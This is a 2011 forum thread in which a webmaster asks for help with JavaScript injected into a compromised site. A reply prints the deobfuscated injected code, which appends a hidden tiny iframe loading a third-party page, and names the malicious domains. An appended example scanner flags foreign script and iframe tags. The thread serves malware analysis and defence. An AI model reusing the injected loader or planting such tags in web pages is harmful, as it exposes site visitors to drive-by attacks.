Javascript Malware

Discussion in 'Software' started by schmoove, Mar 12, 2011.

  1. schmoove

    schmoove Private E-2

    Hello all,

    My web-server has recently been compromised and malicious JavaScript code has been injected into one of my websites like so:

    <script src="http://prstat.in/3">

    I am hoping to find someone here who could examine the above code, which I have pasted here for easy safe viewing: http://pastebin.com/6BRV8Rca - please do not try to execute the code in any way, as it could be harmful.

    I am interested to know the intention of this code and what it does and under what conditions. I am familiar with JavaScript, but my knowledge goes beyond this code. Any help would be much appreciated. Any hints on how I could help myself would be just as good :)

    Further information on the above-mentioned domain hosting the code can be found at the Google "Safe Browsing" Diagnostic page for prstat.in

    Thank you for any help
     
    Last edited by a moderator: Mar 13, 2011
  2. PC-XT

    PC-XT Master Sergeant

    That happened to me, once. My host had it off my site in a few hours. I included a script that checked to make sure it was first in some browsers as a safety measure.

    The script you gave used obfuscation to make it hard to read. Luckily, I don't care. Here it is, with my attempt to remove obfuscation so it is hopefully easier to understand:
    Code:
    // Hides the injected container one second after it has been added.
    function ehide(){
       var e=document.getElementById("tmp_div1");
       e.style.visibility="hidden";
    };
    
    // Runs once the page has loaded: appends a DIV holding a 19x19 iframe that points at a third-party URL.
    function listener(){
       var e=document.createElement("DIV");
       e.id="tmp_div1";
       setTimeout("ehide();",1000);
       document.body.appendChild(e);
       e.innerHTML="&lt;iframe src='ht____tp://slp6.co.cc/forum.php?tp=c9884693c57b61aa' width=19 height=19 frameborder=0 scrolling='no'&gt;&lt;/iframe&gt;";
    };
    
    // Browsers with addEventListener: wait for DOMContentLoaded.
    if(document.addEventListener){
       document.addEventListener("DOMContentLoaded",listener,false);
    }else{
       // Old IE fallback: a deferred dummy script whose readyState signals that the document has loaded.
       document.write('<script id=__ie_onload defer src=javascript:void(0)><\/script>');
       var script=document.getElementById("__ie_onload");
       script.onreadystatechange=function(){
          if(this.readyState=="complete"){listener();}
       };
    }
    I added the underscores in what was 'http://' in the iframe code so someone wouldn't accidentally click it. I can't download the file it refers to, as it says unknown error, but it could be anything.
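
A defender-side check for the kind of injection discussed in this thread, as an added example that is not part of either post: it scans a page's HTML for `<script>` and `<iframe>` tags whose `src` resolves outside an allow-list and marks frames only a few pixels in size. The allow-list, the host names, the 20-pixel threshold and the sample page are constructed assumptions.

```javascript
// Added example (not from the thread). Hosts and SAMPLE_PAGE are constructed.
const ALLOWED_HOSTS = new Set(["www.example.com", "cdn.example.com"]);

// Read one attribute (quoted or unquoted) out of a tag's attribute text.
function attr(attrs, name) {
  const re = new RegExp(
    "(?:^|\\s)" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Return every <script>/<iframe> whose src resolves outside the allow-list.
function findForeignLoads(html, pageUrl, allowed = ALLOWED_HOSTS) {
  const findings = [];
  const tagRe = /<(script|iframe)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const src = attr(m[2], "src");
    if (!src) continue; // inline script: needs a separate content review
    const line = html.slice(0, m.index).split("\n").length;
    let url;
    try {
      url = new URL(src, pageUrl); // resolves relative and //host forms
    } catch (e) {
      findings.push({ line, tag, src, reason: "unparseable src" });
      continue;
    }
    if (!/^https?:$/.test(url.protocol)) {
      findings.push({ line, tag, src, reason: "non-http(s) src" });
    } else if (!allowed.has(url.hostname)) {
      // Frames of a few pixels are sized so the visitor does not notice them.
      const w = parseInt(attr(m[2], "width"), 10);
      const h = parseInt(attr(m[2], "height"), 10);
      const tiny = tag === "iframe" && w <= 20 && h <= 20;
      findings.push({ line, tag, src, host: url.hostname,
        reason: tiny ? "foreign host, near-invisible frame" : "foreign host" });
    }
  }
  return findings;
}

// Constructed sample page: two legitimate loads, then two injected elements.
const SAMPLE_PAGE = [
  '<script src="/js/site.js"></script>',
  '<script src="//cdn.example.com/lib.js"></script>',
  '<script src="http://injected.example.net/3">',
  "<iframe src='http://frames.example.org/f.php' width=19 height=19></iframe>",
].join("\n");
console.log(findForeignLoads(SAMPLE_PAGE, "http://www.example.com/index.html"));
```

Run against the files on disk rather than the live site, this reports the line of each unexpected tag; a loader that builds its iframe at run time, like the one deobfuscated above, only shows up through the injected `<script src>` tag itself.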
     
  3. PC-XT

    PC-XT Master Sergeant

    Last edited: Mar 13, 2011
